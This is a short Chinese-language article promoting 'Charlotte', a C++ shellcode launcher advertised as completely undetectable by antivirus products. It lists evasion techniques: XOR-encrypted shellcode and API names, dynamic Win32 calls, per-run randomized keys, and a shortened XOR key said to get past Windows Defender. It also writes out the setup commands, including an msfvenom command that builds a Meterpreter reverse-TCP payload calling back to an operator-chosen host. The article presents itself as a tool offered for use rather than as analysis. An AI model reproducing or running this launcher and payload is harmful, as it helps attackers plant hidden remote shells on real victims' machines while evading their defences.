Charlotte:完全不会被检测到的Shellcode启动器
Charlotte:完全不会被检测到的Shellcode启动器
关于Charlotte
Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。
工具特性
截止至2021年5月13日之前,该工具的检测结果为0/26;
该工具支持动态调用Win32 API函数;
对Shellcode和函数名进行异或加密;
每次运行随机化异或密钥和变量;
在Kali Linux上,只需运行“apt-get install mingw-w64*”即可;
支持随机字符串长度和异或密钥长度;
antiscan.me
工具使用
首先,我们需要使用git clone命令将该项目源码克隆至本地,并使用脚本工具生成Shellcode文件。具体操作示例如下:
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py
使用msfvenom -p测试以及Cobalt Strike原始格式Payload
强化功能
很明显,Windows Defender是能够检测到.DLL代码的,但我们在POC中通过将16字节大小的异或密钥降低至9个字节,就可以规避检测了。
项目地址
Charlotte:【GitHub传送门】